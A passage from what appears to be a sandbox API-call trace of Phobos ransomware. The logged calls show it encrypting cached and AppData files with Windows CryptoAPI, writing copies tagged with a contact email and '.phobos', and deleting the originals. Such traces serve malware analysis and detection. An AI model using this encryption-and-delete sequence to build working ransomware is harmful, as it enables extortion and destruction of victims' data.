dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0190.650] GetFileSizeEx (in: hFile=0x154, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=961) returned 1 [0190.650] CloseHandle (hObject=0x154) returned 1 [0190.650] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\js[2]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\js[2]")) returned 0x2020 [0190.650] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\js[2].id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\js[2].id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0190.650] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\js[2]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\js[2]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0190.651] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0190.651] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0190.651] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\js[2].id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\js[2].id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0190.652] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32d28) returned 1 [0190.652] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0190.652] ReadFile (in: hFile=0x154, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x3c1, lpOverlapped=0x0) returned 1 [0190.745] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x3d0, dwBufLen=0x3d0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x3d0) returned 1 [0190.745] WriteFile (in: hFile=0x14c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x3d0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x3d0, lpOverlapped=0x0) returned 1 [0190.746] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa327e8) returned 1 [0190.746] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0190.746] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x30, dwBufLen=0x30 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x30) returned 1 [0190.746] CryptDestroyKey (hKey=0xa327e8) returned 1 [0190.746] WriteFile (in: hFile=0x14c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xe2, lpOverlapped=0x0) returned 1 [0190.747] CryptDestroyKey (hKey=0xa32d28) returned 1 [0190.747] CloseHandle (hObject=0x154) returned 1 [0190.747] CloseHandle (hObject=0x14c) returned 1 [0190.747] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\js[2]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\js[2]")) returned 1 [0190.750] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0190.750] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\latest[2].eot" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\latest[2].eot"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0190.751] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=28315) returned 1 [0190.751] CloseHandle (hObject=0x14c) returned 1 [0190.751] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\latest[2].eot" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\latest[2].eot")) returned 0x2020 [0190.751] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\latest[2].eot.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\latest[2].eot.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0190.751] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\latest[2].eot" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\latest[2].eot"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0190.751] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0190.751] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0190.751] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\latest[2].eot.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\latest[2].eot.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0190.752] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32d28) returned 1 [0190.752] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0190.752] ReadFile (in: hFile=0x14c, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x6e9b, lpOverlapped=0x0) returned 1 [0190.765] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x6ea0, dwBufLen=0x6ea0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x6ea0) returned 1 [0190.765] WriteFile (in: hFile=0x154, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x6ea0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x6ea0, lpOverlapped=0x0) returned 1 [0190.767] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32ae8) returned 1 [0190.767] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0190.767] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0190.767] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0190.767] WriteFile (in: hFile=0x154, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0190.767] CryptDestroyKey (hKey=0xa32d28) returned 1 [0190.767] CloseHandle (hObject=0x14c) returned 1 [0190.767] CloseHandle (hObject=0x154) returned 1 [0190.767] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\latest[2].eot" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\latest[2].eot")) returned 1 [0190.769] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0190.769] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\thirdparty[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\thirdparty[1]"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0190.771] GetFileSizeEx (in: hFile=0x154, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=0) returned 1 [0190.771] CloseHandle (hObject=0x154) returned 1 [0190.771] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0190.771] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\v2[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\v2[1]"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0190.772] GetFileSizeEx (in: hFile=0x154, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=13093) returned 1 [0190.772] CloseHandle (hObject=0x154) returned 1 [0190.772] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\v2[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\v2[1]")) returned 0x2020 [0190.773] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\v2[1].id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\v2[1].id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0190.773] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\v2[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\v2[1]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0190.773] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0190.773] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0190.773] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\v2[1].id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\v2[1].id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0190.774] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32d28) returned 1 [0190.775] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0190.775] ReadFile (in: hFile=0x154, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x3325, lpOverlapped=0x0) returned 1 [0190.858] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x3330, dwBufLen=0x3330 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x3330) returned 1 [0190.858] WriteFile (in: hFile=0x14c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x3330, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x3330, lpOverlapped=0x0) returned 1 [0190.859] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa327e8) returned 1 [0190.859] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0190.859] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x30, dwBufLen=0x30 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x30) returned 1 [0190.859] CryptDestroyKey (hKey=0xa327e8) returned 1 [0190.859] WriteFile (in: hFile=0x14c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xe2, lpOverlapped=0x0) returned 1 [0190.860] CryptDestroyKey (hKey=0xa32d28) returned 1 [0190.860] CloseHandle (hObject=0x154) returned 1 [0190.860] CloseHandle (hObject=0x14c) returned 1 [0190.860] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\v2[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\v2[1]")) returned 1 [0190.861] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0190.861] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\UsrClass.dat.LOG1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\usrclass.dat.log1"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0190.861] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0190.861] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\UsrClass.dat.LOG2" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\usrclass.dat.log2"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0190.861] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0190.861] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\UsrClass.dat{0f6d7aa7-f51a-11df-ae0e-001d09f21116}.TM.blf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\usrclass.dat{0f6d7aa7-f51a-11df-ae0e-001d09f21116}.tm.blf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0190.861] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=65536) returned 1 [0190.861] CloseHandle (hObject=0x14c) returned 1 [0190.861] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\UsrClass.dat{0f6d7aa7-f51a-11df-ae0e-001d09f21116}.TM.blf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\usrclass.dat{0f6d7aa7-f51a-11df-ae0e-001d09f21116}.tm.blf")) returned 0x2026 [0190.862] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\UsrClass.dat{0f6d7aa7-f51a-11df-ae0e-001d09f21116}.TM.blf.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\usrclass.dat{0f6d7aa7-f51a-11df-ae0e-001d09f21116}.tm.blf.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0190.862] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\UsrClass.dat{0f6d7aa7-f51a-11df-ae0e-001d09f21116}.TM.blf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\usrclass.dat{0f6d7aa7-f51a-11df-ae0e-001d09f21116}.tm.blf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0190.862] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0190.862] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\UsrClass.dat{0f6d7aa7-f51a-11df-ae0e-001d09f21116}.TMContainer00000000000000000001.regtrans-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\usrclass.dat{0f6d7aa7-f51a-11df-ae0e-001d09f21116}.tmcontainer00000000000000000001.regtrans-ms"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0190.862] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=524288) returned 1 [0190.862] CloseHandle (hObject=0x14c) returned 1 [0190.862] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\UsrClass.dat{0f6d7aa7-f51a-11df-ae0e-001d09f21116}.TMContainer00000000000000000001.regtrans-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\usrclass.dat{0f6d7aa7-f51a-11df-ae0e-001d09f21116}.tmcontainer00000000000000000001.regtrans-ms")) returned 0x2026 [0190.863] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\UsrClass.dat{0f6d7aa7-f51a-11df-ae0e-001d09f21116}.TMContainer00000000000000000001.regtrans-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\usrclass.dat{0f6d7aa7-f51a-11df-ae0e-001d09f21116}.tmcontainer00000000000000000001.regtrans-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0190.863] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\UsrClass.dat{0f6d7aa7-f51a-11df-ae0e-001d09f21116}.TMContainer00000000000000000001.regtrans-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\usrclass.dat{0f6d7aa7-f51a-11df-ae0e-001d09f21116}.tmcontainer00000000000000000001.regtrans-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0190.863] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0190.863] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\UsrClass.dat{0f6d7aa7-f51a-11df-ae0e-001d09f21116}.TMContainer00000000000000000002.regtrans-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\usrclass.dat{0f6d7aa7-f51a-11df-ae0e-001d09f21116}.tmcontainer00000000000000000002.regtrans-ms"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0190.863] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=524288) returned 1 [0190.863] CloseHandle (hObject=0x14c) returned 1 [0190.863] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\UsrClass.dat{0f6d7aa7-f51a-11df-ae0e-001d09f21116}.TMContainer00000000000000000002.regtrans-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\usrclass.dat{0f6d7aa7-f51a-11df-ae0e-001d09f21116}.tmcontainer00000000000000000002.regtrans-ms")) returned 0x2026 [0190.863] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\UsrClass.dat{0f6d7aa7-f51a-11df-ae0e-001d09f21116}.TMContainer00000000000000000002.regtrans-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\usrclass.dat{0f6d7aa7-f51a-11df-ae0e-001d09f21116}.tmcontainer00000000000000000002.regtrans-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0190.863] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\UsrClass.dat{0f6d7aa7-f51a-11df-ae0e-001d09f21116}.TMContainer00000000000000000002.regtrans-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\usrclass.dat{0f6d7aa7-f51a-11df-ae0e-001d09f21116}.tmcontainer00000000000000000002.regtrans-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0190.864] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0190.864] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\account{047ef9ce-9c1f-4250-9ca7-d206db8b643c}.oeaccount"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0190.864] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1508) returned 1 [0190.864] CloseHandle (hObject=0x14c) returned 1 [0190.864] 